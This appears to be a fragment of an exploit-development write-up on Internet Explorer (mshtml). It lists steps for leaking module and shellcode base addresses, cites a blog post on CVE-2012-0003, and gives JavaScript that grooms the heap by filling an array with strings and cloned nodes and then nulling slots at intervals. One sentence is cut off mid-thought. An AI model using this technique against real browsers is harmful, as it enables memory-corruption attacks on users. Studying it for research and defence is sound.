leak mshtml base address
leak shellcode base address
The approach for leaking the shellcode base combines the article at http://www.vupen.com/blog/20120117.Advanced_Exploitation_of_Windows_MS12-004_CVE-2012-0003.php and
Part of the code is as follows:
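// Fill the array in groups of four: three substrings of up to 125 characters
// followed by a deep clone of the selob element.
for (var i = 0; i < 3000; i += 4)
{
    fillbuff[i] = string_A.substr(0, 125);
    fillbuff[i + 1] = string_B.substr(0, 125);
    fillbuff[i + 2] = string_C.substr(0, 125);
    fillbuff[i + 3] = selob.cloneNode(true);
}
// Drop the reference held in every 12th slot starting at index 4
// (the string_A entry of every third group).
for (var i = 4; i < 3000; i += 12)
{
    fillbuff[i] = null;
}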